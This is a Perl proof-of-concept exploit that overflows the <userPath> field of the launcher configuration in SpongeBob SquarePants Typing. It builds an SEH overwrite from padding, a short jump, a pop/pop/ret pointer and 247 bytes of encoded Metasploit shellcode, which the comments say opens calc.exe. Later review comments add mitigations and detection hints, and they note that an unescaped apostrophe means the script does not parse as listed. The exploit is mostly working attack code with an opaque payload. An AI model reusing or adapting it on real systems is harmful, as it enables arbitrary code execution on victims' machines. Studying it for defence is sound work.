# SEH overwrite exploit for SpongeBob SquarePants Typing
# from The Learning Company (http://goo.gl/1EHaD)
# Date: May 4th 2011
# Author: Infant Overflow
#
# .-.
# ) (
# - -
# |_____|
# / \
# | ~~~ |
# | ~~~~~ |
# | ~~~~~ |
# | ~~~~~ |
# \_______/
#
# Fresh out the womb laying the smack down on SpongeBob
# I like my sploits like I like my milk... fresh
#
# Shoutz to Pops, Elmo, my girl Dora, Handy M, and Thomas the Mother f'n Train
#
# Tested on WinXP SP3
# Filler bytes that precede the exception-handler record in the oversized
# <userPath> value: 1024 copies of the letter "A".
my $diaper = 'A' x 1024;

# Next-handler field of the overwritten SEH record: a short jump forward by
# 6 (EB 06) followed by two NOP bytes, four bytes in total.
my $jumprope = pack('C*', 0xEB, 0x06, 0x90, 0x90);

# Handler field of the overwritten SEH record: 0x2110234D stored little-endian.
# Per the original author this is a pop/pop/ret sequence inside mss32.dll, a
# module shipped without /SAFESEH. That missing linker protection is the
# precondition for this technique; NOTE(review): SafeSEH-built modules and
# SEHOP are the usual mitigations -- confirm against the target build.
my $pacifier = "\x4D\x23\x10\x21";
# windows/exec - 247 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=process, CMD=c:\windows\system32\calc.exe
#
# Opaque, encoder-obfuscated payload bytes (17 rows of 14 bytes plus a final
# row of 9 = 247, matching the generator header above). According to that
# header its only action is to start calc.exe, i.e. a visible proof that code
# ran rather than a damaging action.
# NOTE(review): the behaviour is taken from the header comment; the bytes are
# not verified here.
# For analysts: shikata_ga_nai output differs on every generation, so a byte
# signature on this exact blob identifies this one sample only. The launcher
# process spawning calc.exe is the more durable indicator.
my $shellcode =
"\xd9\xf6\xba\x24\xb5\x20\x67\xd9\x74\x24\xf4\x5f\x2b\xc9" .
"\xb1\x38\x31\x57\x17\x03\x57\x17\x83\xcb\x49\xc2\x92\xef" .
"\x5a\x8a\x5d\x0f\x9b\xed\xd4\xea\xaa\x3f\x82\x7f\x9e\x8f" .
"\xc0\x2d\x13\x7b\x84\xc5\xa0\x09\x01\xea\x01\xa7\x77\xc5" .
"\x92\x09\xb8\x89\x51\x0b\x44\xd3\x85\xeb\x75\x1c\xd8\xea" .
"\xb2\x40\x13\xbe\x6b\x0f\x86\x2f\x1f\x4d\x1b\x51\xcf\xda" .
"\x23\x29\x6a\x1c\xd7\x83\x75\x4c\x48\x9f\x3e\x74\xe2\xc7" .
"\x9e\x85\x27\x14\xe2\xcc\x4c\xef\x90\xcf\x84\x21\x58\xfe" .
"\xe8\xee\x67\xcf\xe4\xef\xa0\xf7\x16\x9a\xda\x04\xaa\x9d" .
"\x18\x77\x70\x2b\xbd\xdf\xf3\x8b\x65\xde\xd0\x4a\xed\xec" .
"\x9d\x19\xa9\xf0\x20\xcd\xc1\x0c\xa8\xf0\x05\x85\xea\xd6" .
"\x81\xce\xa9\x77\x93\xaa\x1c\x87\xc3\x12\xc0\x2d\x8f\xb0" .
"\x15\x57\xd2\xde\xe8\xd5\x68\xa7\xeb\xe5\x72\x87\x83\xd4" .
"\xf9\x48\xd3\xe8\x2b\x2d\x2b\xa3\x76\x07\xa4\x6a\xe3\x1a" .
"\xa9\x8c\xd9\x58\xd4\x0e\xe8\x20\x23\x0e\x99\x25\x6f\x88" .
"\x71\x57\xe0\x7d\x76\xc4\x01\x54\x15\xd0\xa1\x20\xb3\x4a" .
"\x3e\xa0\x34\xe1\xe2\x4d\xc2\x76\x6f\xd7\x59\x4b\xbd\x4b" .
"\xc1\xca\xad\x10\x2b\x69\x56\xb2\x33";
# Opening part of the launcher configuration file: the XML declaration, the
# <startup> root element and the start of the quoted <userPath> value. The
# oversized value is appended directly after the opening double quote, so
# <userPath> is the field whose length the application evidently does not
# bound.
my $rattle = join "\n",
    '<?xml version="1.0" standalone="yes"?>',
    '<startup>',
    '<userPath>"';
# Closing part of the launcher configuration file. It closes the quoted
# <userPath> value and carries the rest of the <startup> document: the screen
# layout, button targets and system-requirement checks. Everything in this
# literal is static data with hard-coded install and CD paths; none of it is
# part of the oversized value.
# NOTE(review): the apostrophe in "User's Guide.pdf" below is not escaped, so
# as listed this single-quoted literal ends at that point and the script does
# not parse. The listing may have lost a character when the page was captured;
# confirm against the original advisory.
my $playpen = '"</userPath>
<cdName>"SpongeBob SquarePants Typing"</cdName>
<cdAge>7-10</cdAge>
<music>1000</music>
<pdfInstaller>"E:\INSTALL\ACROBAT\Ver50\Acrobat Reader 5 Installer.exe"</pdfInstaller>
<signin>
<execute>yes</execute>
<style>tlc</style>
<age>4To6</age>
<rscFile>default</rscFile>
</signin>
<disk1>
<filename>E:\TLC\383167-CD</filename>
<cdName>"SpongeBob SquarePants Typing"</cdName>
</disk1>
<screenRSC>salstartup.rsc</screenRSC>
<screen>
<element>
<condition>all</condition>
<type>scene</type>
<id>9100</id>
</element>
<element>
<condition>all</condition>
<type>toon</type>
<x>0</x>
<y>0</y>
<id>9100</id>
<startFrame>1</startFrame>
</element>
<mainPlayButton>
<condition>all</condition>
<type>fob</type>
<class>play</class>
<cdCheck>disk1</cdCheck>
<target>"C:\Program Files\The Learning Company\SpongeBob SquarePants Typing\SPT.exe"</target>
<postLaunch>wait</postLaunch>
<x>461</x>
<y>60</y>
<id>9124</id>
</mainPlayButton>
<helpButton>
<condition>all</condition>
<type>fob</type>
<class>extension</class>
<cdCheck></cdCheck>
<target>"C:\Program Files\The Learning Company\SpongeBob SquarePants Typing\User's Guide.pdf"</target>
<parameters></parameters>
<postLaunch>wait</postLaunch>
<x>543</x>
<y>158</y>
<id>9126</id>
</helpButton>
<uninstallButton>
<condition>all</condition>
<type>fob</type>
<class>uninstall</class>
<target>C:\WINDOWS\TLCUninstall.exe</target>
<parameters>-l</parameters>
<crc>"C:\Program Files\The Learning Company\SpongeBob SquarePants Typing\Uninstall.xml"</crc>
<postLaunch>exit</postLaunch>
<x>514</x>
<y>373</y>
<id>9125</id>
</uninstallButton>
<onlineButton>
<condition>all</condition>
<type>fob</type>
<class>link</class>
<cdCheck></cdCheck>
<target>http://redirect.expressit.com/redirect.asp?resku=383167&action_id=Launcher</target>
<parameters></parameters>
<postLaunch>wait</postLaunch>
<x>538</x>
<y>263</y>
<yy>375</yy>
<id>9130</id>
</onlineButton>
<EregButton>
<condition>all</condition>
<type>fob</type>
<class>install</class>
<cdCheck></cdCheck>
<target>"C:\Program Files\The Learning Company\SpongeBob SquarePants Typing\ereg\ereg32.exe"</target>
<parameters></parameters>
<postLaunch>wait</postLaunch>
<x>522</x>
<y>324</y>
<id>9129</id>
</EregButton>
<SellScreen>
<condition>all</condition>
<type>fob</type>
<class>link</class>
<cdCheck>disk1</cdCheck>
<target>startup:startup/BrandingPage</target>
<parameters></parameters>
<postLaunch>wait</postLaunch>
<x>543</x>
<y>207</y>
<id>9128</id>
</SellScreen>
</screen>
<BrandingPage>
<element>
<condition>all</condition>
<type>toon</type>
<id>5000</id>
</element>
<screenSaverButton>
<condition>all</condition>
<type>fob</type>
<class>install</class>
<cdCheck>disk1</cdCheck>
<target>E:\SailorificStuff\sbscreen_setup.exe</target>
<parameters></parameters>
<postLaunch>wait</postLaunch>
<x>546</x>
<y>188</y>
<id>5054</id>
</screenSaverButton>
<backButton>
<condition>all</condition>
<type>fob</type>
<class>link</class>
<target>startup:startup/screen</target>
<x>537</x>
<y>263</y>
<id>5055</id>
</backButton>
</BrandingPage>
<sysReq>
<execute>yes</execute>
<pc>
<processor>
<family>pentium</family>
<speed>266</speed>
<msgType>warn</msgType>
<msgText>"266 MHz Pentium or faster is recommended."</msgText>
</processor>
<os>
<Win95>no</Win95>
<Win98>yes</Win98>
<WinMe>yes</WinMe>
<WinNT4>no</WinNT4>
<Win2000>yes</Win2000>
<WinXP>yes</WinXP>
<msgType>warn</msgType>
<msgText>"You operating system is not supported. Play at your own risk!"</msgText>
</os>
<diskSpace>
<mbAvailable>100</mbAvailable>
<msgType>ignore</msgType>
<msgText>"There is not enough hard disk space available to play!"</msgText>
</diskSpace>
<physicalRAM>
<mbAvailable>64</mbAvailable>
<msgType>warn</msgType>
<msgText>"There is not enough RAM available to play!"</msgText>
</physicalRAM>
<availableRAM>
<mbAvailable>64</mbAvailable>
<msgType>warn</msgType>
<msgText>You are low on memory!</msgText>
</availableRAM>
<display>
<width>800</width>
<height>600</height>
<bits>16</bits>
<msgType>fail</msgType>
<msgText>"Your display is not capable of 800 x 600 16-bit, thousands of colors."</msgText>
</display>
<sound>
<msgType>fail</msgType>
<msgText>"WAVE driver is not available."</msgText>
</sound>
</pc>
<mac>
<processor>
<family>ppc</family>
<speed>233</speed>
<msgType>warn</msgType>
<msgText>"233 MHz Powerpc or faster is recommended."</msgText>
</processor>
<os>
<minVersion>0860</minVersion>
<msgType>fail</msgType>
<msgText>"You must run System 8.6 or above!"</msgText>
</os>
<osX>
<minVersion>1004</minVersion>
<msgType>fail</msgType>
<msgText>"You must run OSX 10.04 or above!"</msgText>
</osX>
<diskSpace>
<mbAvailable>100</mbAvailable>
<msgType>ignore</msgType>
<msgText>"There is not enough hard disk space available to play!"</msgText>
</diskSpace>
<physicalRAM>
<mbAvailable>64</mbAvailable>
<msgType>warn</msgType>
<msgText>"There is not enough RAM available to play!"</msgText>
</physicalRAM>
<availableRAM>
<mbAvailable>0</mbAvailable>
<msgType>warn</msgType>
<msgText></msgText>
</availableRAM>
<colorDepth>
<minBits>16</minBits>
<msgType>warn</msgType>
<msgText>"Your display is not capable of 16-bit, thousands of colors."</msgText>
</colorDepth>
<sound>
<available>ignore</available>
<msgType>ignore</msgType>
<msgText></msgText>
</sound>
</mac>
</sysReq>
</startup>';
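# Trailing filler: 1000 NOP bytes placed after the encoded payload, still
# inside the quoted <userPath> value.
my $slide = "\x90" x 1000;

# Write the proof-of-concept configuration file into the current directory.
#
# Layout of the <userPath> value: padding (1024) + jump (4) + handler
# pointer (4) + payload (247) + filler (1000) = 2279 bytes, most of them
# non-printable. A <userPath> value of that size, or one holding raw binary,
# is the file-level anomaly a defender can check for in salstartup.xml.
# NOTE(review): the root cause appears to be an unbounded copy of <userPath>
# in the product's launcher -- confirm against the vendor binary.
#
# Changes from the original two-argument, bareword, unchecked open(): the
# three-argument form with a lexical handle keeps the file name from being
# interpreted as a mode, and open/print/close failures are reported instead
# of being silently ignored. The bytes written are unchanged.
my $outfile = 'salstartup.xml';
open(my $out, '>', $outfile)
    or die "Cannot open $outfile for writing: $!";
print {$out} $rattle . $diaper . $jumprope . $pacifier . $shellcode . $slide . $playpen
    or die "Cannot write to $outfile: $!";
close($out)
    or die "Cannot close $outfile: $!";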